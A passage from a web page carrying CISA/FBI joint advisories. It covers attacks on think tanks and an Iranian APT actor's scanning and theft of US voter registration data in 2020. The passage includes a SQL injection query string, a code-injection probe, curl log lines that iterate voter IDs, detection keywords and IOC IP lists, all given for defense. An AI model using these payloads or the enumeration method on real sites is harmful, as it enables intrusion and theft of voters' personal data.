Artifacts: Hidden Files and Directories </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1564/001">T1564.001</a>]</li> <li><i>Hide Artifacts: Hidden Window</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1564/003">T1564.003</a>]</li> </ul> </li> <li><i><em><strong>Credential Access</strong></em> </i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0006">TA0006</a>] <ul> <li><i>OS Credential Dumping: LSASS Memory</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/001">T1003.001</a>]</li> <li><i>OS Credential Dumping: Security Account Manager </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1003/002">T1003.002</a>]</li> <li><i>OS Credential Dumping: NTDS</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/003">T1003.003</a>]</li> <li><i>OS Credential Dumping: LSA Secrets</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/004">T1003.004</a>]</li> <li><i>OS Credential Dumping: Cached Domain Credentials</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1003/005">T1003.005</a>]</li> <li><i>Network Sniffing</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1040">T1040</a>]</li> <li><i>Input Capture: Keylogging</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001">T1056.001</a>]</li> <li><i>Brute Force: Password Cracking</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110/002">T1110.002</a>]<i>Brute Force: Password Spraying</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110/003">T1110.003</a>]</li> <li><i>Forced Authentication</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1187">T1187</a>]</li> <li><i>Steal Application Access Token</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1528">T1528</a>]</li> <li><i>Unsecured Credentials: Credentials in Files</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1552/001">T1552.001</a>]</li> <li><i>Unsecured Credentials: Group Policy Preferences</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1552/006">T1552.006</a>]</li> <li><i>Credentials from Password Stores: Credentials from Web Browsers</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1555/003">T1555.003</a>]</li> </ul> </li> <li><i><em><strong>Discovery</strong></em> </i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0007">TA0007</a>] <ul> <li><i>System Service Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1007">T1007</a>]</li> <li><i>Query Registry</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1012">T1012</a>]</li> <li><i>System Network Configuration Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1016">T1016</a>]</li> <li><i>Remote System Discovery </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1018">T1018</a>]</li> <li><i>System Owner/User Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1033">T1033</a>]</li> <li><i>Network Sniffing</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1040">T1040</a>]</li> <li><i>Network Service Scanning</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1046">T1046</a>]</li> <li><i>System Network Connections Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1049">T1049</a>]</li> <li><i>Process Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1057">T1057</a>]</li> <li><i>Permission Groups Discovery: Local Groups</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1069/001">T1069.001</a>]</li> <li><i>Permission Groups Discovery: Domain Groups</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1069/002">T1069.002</a>]</li> <li><i>System Information Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1082">T1082</a>]</li> <li><i>File and Directory Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1083">T1083</a>]</li> <li><i>Account Discovery: Local Account</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1087/001">T1087.001</a>]</li> <li><i>Account Discovery: Domain Account</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1087/002">T1087.002</a>]</li> <li><i>Peripheral Device Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1120">T1120</a>]</li> <li><i>Network Share Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1135">T1135</a>]</li> <li><i>Password Policy Discovery </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1201/">T1201</a>]</li> <li><i>Software Discovery: Security Software Discovery</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1518/001">T1518.001</a>]</li> </ul> </li> <li><i><em><strong>Lateral Movement </strong></em></i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0008">TA0008</a>] <ul> <li><i>Remote Services: Remote Desktop Protocol</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1021/001">T1021.001</a>]</li> <li><i>Remote Services: SSH </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1021/004">T1021.004</a>]</li> <li><i>Taint Shared Content </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1080/">T1080</a>]</li> <li><i>Replication Through Removable Media </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1091">T1091</a>]</li> <li><i>Exploitation of Remote Services</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1210">T1210</a>]</li> <li><i>Use Alternate Authentication Material: Pass the Hash </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1550/002">T1550.002</a>]</li> <li><i>Use Alternate Authentication Material: Pass the Ticket</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1550/003">T1550.003</a>]</li> </ul> </li> <li><i><em><strong>Collection</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0009">TA0009</a>] <ul> <li><i>Data from Local System</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1005">T1005</a>]</li> <li><i>Data from Removable Media</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1025">T1025</a>]</li> <li><i>Data Staged: Local Data Staging</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1074/001">T1074.001</a>]</li> <li><i>Screen Capture</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1113">T1113</a>]</li> <li><i>Email Collection: Local Email Collection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1114/001">T1114.001</a>]</li> <li><i>Email Collection: Remote Email Collection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1114/002">T1114.002</a>]</li> <li><i>Automated Collection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1119">T1119</a>]</li> <li><i>Audio Capture</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1123">T1123</a>]</li> <li><i>Data from Information Repositories: SharePoint </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1213/002">T1213.002</a>]</li> <li><i>Archive Collected Data: Archive via Utility</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1560/001">T1560.001</a>]</li> <li><i>Archive Collected Data: Archive via Custom Method</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1560/003">T1560.003</a>]</li> </ul> </li> <li><i><em><strong>Command and Control</strong></em> </i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0011">TA0011</a>] <ul> <li><i>Data Obfuscation: Junk Data</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1001/001/">T1001.001</a>]</li> <li><i>Fallback Channels</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1008">T1008</a>]</li> <li><i>Application Layer Protocol: Web Protocols</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/001">T1071.001</a>]</li> <li><i>Application Layer Protocol: File Transfer Protocols</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/002">T1071.002</a>]</li> <li><i>Application Layer Protocol: Mail Protocols</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/003">T1071.003</a>]</li> <li><i>Application Layer Protocol: DNS</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1071/004">T1071.004</a>]</li> <li><i>Proxy: External Proxy</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1090/002">T1090.002</a>]</li> <li><i>Proxy: Multi-hop Proxy</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1090/003">T1090.003</a>]</li> <li><i>Proxy: Domain Fronting</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1090/004">T1090.004</a>]</li> <li><i>Communication Through Removable Media</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1092">T1092</a>]</li> <li><i>Non-Application Layer Protocol</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1095">T1095</a>]</li> <li><i>Web Service: Dead Drop Resolver</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1102/001">T1102.001</a>]</li> <li><i>Web Service: Bidirectional Communication</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1102/002">T1102.002</a>]</li> <li><i>Multi-Stage Channels</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1104">T1104</a>]</li> <li><i>Ingress Tool Transfer</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1105">T1105</a>]</li> <li><i>Data Encoding: Standard Encoding</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1132/001">T1132.001</a>]</li> <li><i>Remote Access Software</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1219">T1219</a>]</li> <li><i>Dynamic Resolution: Domain Generation Algorithms</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1568/002">T1568.002</a>]</li> <li><i>Non-Standard Port</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1571">T1571</a>]</li> <li><i>Protocol Tunneling</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1572">T1572</a>]</li> <li><i>Encrypted Channel: Symmetric Cryptography</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1573/001">T1573.001</a>]</li> <li><i>Encrypted Channel: Asymmetric Cryptography</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1573/002">T1573.002</a>]</li> </ul> </li> <li><i><em><strong><span style="display: none;">&nbsp;</span>Exfiltration</strong> </em></i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0010">TA0010</a>] <ul> <li><i>Exfiltration Over C2 Channel</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1041">T1041</a>]</li> <li><i>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1048/003">T1048.003</a>]</li> </ul> </li> <li><i><em><strong>Impact </strong></em></i>[<a href="https://attack.mitre.org/versions/v7/tactics/TA0040">TA0040</a>] <ul> <li><i>Data Encrypted for Impact</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1486">T1486</a>]</li> <li><i>Resource Hijacking</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1496">T1496</a>]</li> <li><i>System Shutdown/Reboot</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1529">T1529</a>]</li> <li><i>Disk Wipe: Disk Structure Wipe</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1561/002">T1561.002</a>]</li> </ul> </li> </ul> <h3>Mitigations</h3><p>CISA and FBI recommend think tank organizations apply the following critical practices to strengthen their security posture.</p> <h4>Leaders</h4> <ul> <li>Implement a training program to familiarize users with identifying social engineering techniques and phishing emails.</li> </ul> <h4>Users/Staff</h4> <ul> <li>Log off remote connections when not in use.</li> <li>Be vigilant against tailored spearphishing attacks targeting corporate and personal accounts (including both email and social media accounts).</li> <li>Use different passwords for corporate and personal accounts.</li> <li>Install antivirus software on personal devices to automatically scan and quarantine suspicious files.</li> <li>Employ strong multi-factor authentication for personal accounts, if available.</li> <li>Exercise caution when: <ul> <li>Opening email attachments, even if the attachment is expected and the sender appears to be known. See <a href="https://www.us-cert.gov/ncas/tips/ST04-010">Using Caution with Email Attachments</a>.</li> <li>Using removable media (e.g., USB thumb drives, external drives, CDs).</li> </ul> </li> </ul> <h4>IT Staff/Cybersecurity Personnel</h4> <ul> <li>Segment and segregate networks and functions.</li> <li>Change the default username and password of applications and appliances.</li> <li>Employ strong multi-factor authentication for corporate accounts.</li> <li>Deploy antivirus software on organizational devices to automatically scan and quarantine suspicious files.</li> <li>Apply encryption to data at rest and data in transit.</li> <li>Use email security appliances to scan and remove malicious email attachments or links.</li> <li>Monitor key internal security tools and identify anomalous behavior. Flag any known indicators of compromise or threat actor behaviors for immediate response.</li> <li>Organizations can implement mitigations of varying complexity and restrictiveness to reduce the risk posed by threat actors who use Tor (The Onion Router) to carry out malicious activities. See the CISA-FBI Joint Cybersecurity Advisory on <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-183a">Defending Against Malicious Cyber Activity Originating from Tor</a> for mitigation options and additional information.</li> <li>Prevent exploitation of known software vulnerabilities by routinely applying software patches and upgrades. Foreign cyber threat actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations. If these vulnerabilities are left unpatched, exploitation often requires few resources and provides threat actors with easy access to victim networks. Review CISA and FBI’s <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a">Top 10 Routinely Exploited Vulnerabilities</a> and other CISA alerts that identify vulnerabilities exploited by foreign attackers.</li> <li>Implement an antivirus program and a formalized patch management process.</li> <li>Block certain websites and email attachments commonly associated with malware (e.g., .scr, .pif, .cpl, .dll, .exe).</li> <li>Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).</li> <li>Implement Group Policy Object and firewall rules.</li> <li>Implement filters at the email gateway and block suspicious IP addresses at the firewall.</li> <li>Routinely audit domain and local accounts as well as their permission levels to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.</li> <li>Follow best practices for design and administration of the network to limit privileged account use across administrative tiers.</li> <li>Implement a Domain-Based Message Authentication, Reporting &amp; Conformance (DMARC) validation system.</li> <li>Disable or block unnecessary remote services.</li> <li>Limit access to remote services through centrally managed concentrators.</li> <li>Deny direct remote access to internal systems or resources by using network proxies, gateways, and firewalls.</li> <li>Limit unnecessary lateral communications.</li> <li>Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.</li> <li>Ensure applications do not store sensitive data or credentials insecurely.</li> <li>Enable a firewall on agency workstations, configured to deny unsolicited connection requests.</li> <li>Disable unnecessary services on agency workstations and servers.</li> <li>Scan for and remove suspicious email attachments; ensure any scanned attachment is its "true file type" (i.e., the extension matches the file header).</li> <li>Monitor users' web browsing habits; restrict access to suspicious or risky sites. Contact law enforcement or CISA immediately regarding any unauthorized network access identified.</li> <li>Visit the MITRE ATT&amp;CK techniques and tactics pages linked in the ATT&amp;CK Profile section above for additional mitigation and detection strategies for this malicious activity targeting think tanks.</li> </ul> <h3>Contact Information</h3><p>Recipients of this report are encouraged to contribute any additional information that they may have related to this threat. To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at <a href="https://us-cert.cisa.govmailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govmailto:Central@cisa.gov">Central@cisa.gov</a>.</p> <h3>References</h3> <ul> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-120a">CISA Alert: Microsoft Office 365 Security Recommendations</a></li> <li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">CISA Alert: Technical Approaches to Uncovering and Remediating Malicious Activity</a></li> <li><a href="https://www.cisa.gov/telework">CISA Webpage: Telework Guidance</a></li> <li><a href="https://www.cisa.gov/vpn-related-guidance">CISA Webpage: VPN-Related Guidance</a></li> <li><a href="http://image.communications.cyber.nj.gov/lib/fe3e15707564047c7c1270/m/2/PIN+-+4.9.2020.pdf">FBI Private Industry Notification: PIN 20200409-001</a></li> </ul> <h3>References</h3> <ul> <li><a href="https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/">[1] CyberScoop: As Europe prepares to vote, Microsoft warns of Fancy Bear attacks on democratic think tanks</a></li> </ul> <h3>Revisions</h3> <ul> <li>Initial Version: December 1, 2020</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
2020. október 30.

AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data

Original release date: October 30, 2020
Summary

This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). CISA and the FBI are aware of an Iranian advanced persistent threat (APT) actor targeting U.S. state websites—to include election websites. CISA and the FBI assess this actor is responsible for the mass dissemination of voter intimidation emails to U.S. citizens and the dissemination of U.S. election-related disinformation in mid-October 2020. This disinformation (hereinafter, “the propaganda video”) was in the form of a video purporting to misattribute the activity to a U.S. domestic actor and implies that individuals could cast fraudulent ballots, even from overseas. https://www.odni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security.  (Reference FBI FLASH message ME-000138-TT, disseminated October 29, 2020). Further evaluation by CISA and the FBI has identified the targeting of U.S. state election websites was an intentional effort to influence and interfere with the 2020 U.S. presidential election.

Click here for a PDF version of this report.

Technical Details

Analysis by CISA and the FBI indicates this actor scanned state websites, to include state election websites, between September 20 and September 28, 2020, with the Acunetix vulnerability scanner (Active Scanning: Vulnerability Scanning [T1595.002]). Acunetix is a widely used and legitimate web scanner, which has been used by threat actors for nefarious purposes. Organizations that do not regularly use Acunetix should monitor their logs for any activity from the program that originates from IP addresses provided in this advisory and consider it malicious reconnaissance behavior. 

Additionally, CISA and the FBI observed this actor attempting to exploit websites to obtain copies of voter registration data between September 29 and October 17, 2020 (Exploit Public-Facing Application [T1190]). This includes attempted exploitation of known vulnerabilities, directory traversal, Structured Query Language (SQL) injection, web shell uploads, and leveraging unique flaws in websites. 

CISA and the FBI can confirm that the actor successfully obtained voter registration data in at least one state. The access of voter registration data appeared to involve the abuse of website misconfigurations and a scripted process using the cURL tool to iterate through voter records. A review of the records that were copied and obtained reveals the information was used in the propaganda video. 

CISA and FBI analysis of identified activity against state websites, including state election websites, referenced in this product cannot all be fully attributed to this Iranian APT actor. FBI analysis of the Iranian APT actor’s activity has identified targeting of U.S. elections’ infrastructure (Compromise Infrastructure [T1584]) within a similar timeframe, use of IP addresses and IP ranges – including numerous virtual private network (VPN) service exit nodes – which correlate to this Iran APT actor (Gather Victim Host Information [T1592)]), and other investigative information. 

Reconnaissance

The FBI has information indicating this Iran-based actor attempted to access PDF documents from state voter sites using advanced open-source queries (Search Open Websites and Domains [T1539]). The actor demonstrated interest in PDFs hosted on URLs with the words “vote” or “voter” and “registration.” The FBI identified queries of URLs for election-related sites. 

The FBI also has information indicating the actor researched  the following information in a suspected attempt to further their efforts to survey and exploit state election websites.

  • YOURLS exploit
  • Bypassing ModSecurity Web Application Firewall
  • Detecting Web Application Firewalls
  • SQLmap tool
Acunetix Scanning

CISA’s analysis identified the scanning of multiple entities by the Acunetix Web Vulnerability scanning platform between September 20 and September 28, 2020 (Active Scanning: Vulnerability Scanning [T1595.002]). 

The actor used the scanner to attempt SQL injection into various fields in /registration/registration/details with status codes 404 or 500:

/registration/registration/details?addresscity=-1 or 3*2<(0+5+513-513) -- &addressstreet1=xxxxx&btnbeginregistration=begin voter registration&btnnextelectionworkerinfo=next&btnnextpersonalinfo=next&btnnextresdetails=next&btnnextvoterinformation=next&btnsubmit=submit&chkageverno=on&chkageveryes=on&chkcitizenno=on&chkcitizenyes=on&chkdisabledvoter=on&chkelectionworker=on&chkresprivate=1&chkstatecancel=on&dlnumber=1&dob=xxxx/x/x&email=sample@email.tst&firstname=xxxxx&gender=radio&hdnaddresscity=&hdngender=&last4ssn=xxxxx&lastname=xxxxxinjjeuee&mailaddresscountry=sample@xxx.xxx&mailaddressline1=sample@email.tst&mailaddressline2=sample@xxx.xxx&mailaddressline3=sample@xxx.xxx&mailaddressstate=aa&mailaddresszip=sample@xxxx.xxx&mailaddresszipex=sample@xxx.xxx&middlename=xxxxx&overseas=1&partycode=a&phoneno1=xxx-xxx-xxxx&phoneno2=xxx-xxx-xxxx&radio=consent&statecancelcity=xxxxxxx&statecancelcountry=usa&statecancelstate=XXaa&statecancelzip=xxxxx&statecancelzipext=xxxxx&suffixname=esq&txtmailaddresscity=sample@xxx.xxx

Requests

The actor used the following requests associated with this scanning activity.

2020-09-26 13:12:56 x.x.x.x GET /x/x v[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 0

2020-09-26 13:13:19 X.X.x.x GET /x/x voterid[$acunetix]=1 443 - x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 1375

2020-09-26 13:13:18 .X.x.x GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 - X.X.x.x 

User Agents Observed

CISA and FBI have observed the following user agents associated with this scanning activity.

Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0 

Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4 

Mozilla/5.0+(X11;+U;+Linux+i686;+en-US;+rv:1.8.1.17)+Gecko/20080922+Ubuntu/7.10+(gutsy)+Firefox/2.0.0.17

Exfiltration Obtaining Voter Registration Data

Following the review of web server access logs, CISA analysts, in coordination with the FBI, found instances of the cURL and FDM User Agents sending GET requests to a web resource associated with voter registration data. The activity occurred between September 29 and October 17, 2020. Suspected scripted activity submitted several hundred thousand queries iterating through voter identification values, and retrieving results with varying levels of success [Gather Victim Identity Information (T1589)]. A sample of the records identified by the FBI reveals they match information in the aforementioned propaganda video.
Requests

The actor used the following requests.

2020-10-17 13:07:51 x.x.x.x GET /x/x voterid=XXXX1 443 - x.x.x.x curl/7.55.1 - 200 0 0 1406

2020-10-17 13:07:55 x.x.x.x GET /x/x voterid=XXXX2 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390

2020-10-17 13:07:58 x.x.x.x GET /x/x voterid=XXXX3 443 - x.x.x.x curl/7.55.1 - 200 0 0 1625

2020-10-17 13:08:00 x.x.x.x GET /x/x voterid=XXXX4 443 - x.x.x.x curl/7.55.1 - 200 0 0 1390

Note: incrementing voterid values in cs_uri_query field

User Agents

CISA and FBI have observed the following user agents.

FDM+3.x

curl/7.55.1

Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 0 
Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4

See figure 1 below for a timeline of the actor’s malicious activity.

Figure 1: Overview of malicious activity

MitigationsDetection Acunetix Scanning

Organizations can identify Acunetix scanning activity by using the following keywords while performing log analysis.

  • $acunetix
  • acunetix_wvs_security_test
Indicators of Compromise

For a downloadable copy of IOCs, see AA20-304A.stix.

Disclaimer: Many of the IP addresses included below likely correspond to publicly available VPN services, which can be used by individuals all over the world. Although this creates the potential for false positives, any activity listed should warrant further investigation. The actor likely uses various IP addresses and VPN services.

The following IPs have been associated with this activity.

  • 102.129.239[.]185 (Acunetix Scanning)
  • 143.244.38[.]60 (Acunetix Scanning and cURL requests)
  • 45.139.49[.]228 (Acunetix Scanning)
  • 156.146.54[.]90 (Acunetix Scanning)
  • 109.202.111[.]236 (cURL requests)
  • 185.77.248[.]17 (cURL requests)
  • 217.138.211[.]249 (cURL requests)
  • 217.146.82[.]207 (cURL requests)
  • 37.235.103[.]85 (cURL requests)
  • 37.235.98[.]64 (cURL requests)
  • 70.32.5[.]96 (cURL requests)
  • 70.32.6[.]20 (cURL requests)
  • 70.32.6[.]8 (cURL requests)
  • 70.32.6[.]97 (cURL requests)
  • 70.32.6[.]98 (cURL requests)
  • 77.243.191[.]21 (cURL requests and FDM+3.x (Free Download Manager v3) enumeration/iteration)
  • 92.223.89[.]73 (cURL requests)

CISA and the FBI are aware the following IOCs have been used by this Iran-based actor. These IP addresses facilitated the mass dissemination of voter intimidation email messages on October 20, 2020.

  • 195.181.170[.]244 (Observed September 30 and October 20, 2020)
  • 102.129.239[.]185 (Observed September 30, 2020)
  • 104.206.13[.]27 (Observed September 30, 2020)
  • 154.16.93[.]125 (Observed September 30, 2020)
  • 185.191.207[.]169 (Observed September 30, 2020)
  • 185.191.207[.]52 (Observed September 30, 2020)
  • 194.127.172[.]98 (Observed September 30, 2020)
  • 194.35.233[.]83 (Observed September 30, 2020)
  • 198.147.23[.]147 (Observed September 30, 2020)
  • 198.16.66[.]139(Observed September 30, 2020)
  • 212.102.45[.]3 (Observed September 30, 2020)
  • 212.102.45[.]58 (Observed September 30, 2020)
  • 31.168.98[.]73 (Observed September 30, 2020)
  • 37.120.204[.]156 (Observed September 30, 2020)
  • 5.160.253[.]50 (Observed September 30, 2020)
  • 5.253.204[.]74 (Observed September 30, 2020)
  • 64.44.81[.]68 (Observed September 30, 2020)
  • 84.17.45[.]218 (Observed September 30, 2020)
  • 89.187.182[.]106 (Observed September 30, 2020)
  • 89.187.182[.]111 (Observed September 30, 2020)
  • 89.34.98[.]114 (Observed September 30, 2020)
  • 89.44.201[.]211 (Observed September 30, 2020)
Recommendations

The following list provides recommended self-protection mitigation strategies against cyber techniques used by advanced persistent threat actors: 

  • Validate input as a method of sanitizing untrusted input submitted by web application users. Validating input can significantly reduce the probability of successful exploitation by providing protection against security flaws in web applications. The types of attacks possibly prevented include SQL injection, Cross Site Scripting (XSS), and command injection.
  • Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable unnecessary services and install available patches for the services in use. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
  • Verify all cloud-based virtual machine instances with a public IP, and avoid using open RDP ports, unless there is a valid need. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.
  • Enable strong password requirements and account lockout policies to defend against brute-force attacks.
  • Apply multi-factor authentication, when possible.
  • Maintain a good information back-up strategy by routinely backing up all critical data and system configuration information on a separate device. Store the backups offline, verify their integrity, and verify the restoration process.
  • Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.
  • Ensure third parties that require RDP access follow internal remote access policies.
  • Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.
  • Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as a VPNs. However, recognize the security of VPNs matches the security of the connected devices.
  • Use security features provided by social media platforms; use strong passwords, change passwords frequently, and use a different password for each social media account. 
  • See CISA’s Tip on Best Practices for Securing Election Systems for more information. 
General Mitigations

Keep applications and systems updated and patched

Apply all available software updates and patches and automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed of threat actors to create new exploits following the release of  a patch. These “N-day” exploits can be as damaging as zero-day exploits. Ensure the authenticity and integrity of vendor updates by using signed updates delivered over protected links. Without the rapid and thorough application of patches, threat actors can operate inside a defender’s patch cycle. NSA "NSA'S Top Ten Cybersecurity Mitigation Strategies" https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf Additionally, use tools (e.g., the OWASP Dependency-Check Project tool https://owasp.org/www-project-dependency-check/) to identify the publicly known vulnerabilities in third-party libraries depended upon by the application.

Scan web applications for SQL injection and other common web vulnerabilities

Implement a plan to scan public-facing web servers for common web vulnerabilities (e.g., SQL injection, cross-site scripting) by using a commercial web application vulnerability scanner in combination with a source code scanner. https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm Fixing or patching vulnerabilities after they are identified is especially crucial for networks hosting older web applications. As sites get older, more vulnerabilities are discovered and exposed.

Deploy a web application firewall  

Deploy a web application firewall (WAF) to prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools. 

Deploy techniques to protect against web shells

